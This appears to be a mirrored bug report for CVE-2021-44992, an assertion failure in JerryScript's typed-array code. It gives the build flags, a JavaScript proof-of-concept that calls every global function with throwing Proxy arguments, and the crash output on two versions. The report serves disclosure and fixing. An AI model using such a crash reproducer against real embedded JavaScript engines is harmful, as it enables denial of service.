Headline

CVE-2021-44992: Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma-typedarray-object(ecma_get_typedarray_id) · Issue #4875 · jerryscript-project/jerryscript

There is an Assertion '’ecma_object_is_typedarray (obj_p)‘’ failed at /jerry-core/ecma/operations/ecma-typedarray-object.c in Jerryscript 3.0.0.

2 years ago

CVE

Open in Source

#ubuntu #linux #js

JerryScript revision

Commit: 51da1551 Version: v3.0.0

Commit: 8ba0d1b Version: v2.4.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

Test case

function isPoT(obj, name, type) { let desc; desc = Object.getOwnPropertyDescriptor(obj, name); return typeof type === ‘undefined’ || typeof desc.value === type; }

function getPs(obj, type) { let properties = [];

for (let name of Object.getOwnPropertyNames(obj)) { if (isPoT(obj, name, type)) { properties.push(name); } }

return properties; }

function* genObj(root = this, level = 0) { if (level > 4) { return; }

let obj_names = getPs(root, ‘object’);

for (let obj_name of obj_names) { if (obj_name.startsWith(‘$’)) { continue; }

let obj \= root\[obj\_name\];
yield obj;
yield\* genObj(obj, level + 1);

} }

function JSEtestObj() { let objects = [];

for (let obj of genObj()) { if (!objects.includes(obj)) { objects.push(obj); } }

return objects; }

function JSEtestFunc(obj) { return getPs(obj, ‘function’); }

const thrower = new Proxy({}, { get() { throw 0xc0defefe; }

});

for (let o of JSEtestObj()) { for (let f of JSEtestFunc(o)) { const arityPlusOne = o[f].length + 1; try { o[f](Array(arityPlusOne).fill(thrower)); } catch (e) { if (`${e}`.includes(‘1’)) { try { new o[f](Array(arityPlusOne).fill(thrower)); } catch (e) {} } else { } } } }

Execution steps & Output

Version: v3.0.0

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma_object_is_typedarray (obj_p)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c(ecma_get_typedarray_id):764. Error: ERR_FAILED_INTERNAL_ASSERTION

Version: v2.4.0

$ ~/jerryscript-2.4.0/build/bin/jerry poc.js Script Error: assertion failed Script backtrace (top 5): 0: poc.js:72

Credits: Found by OWL337 team.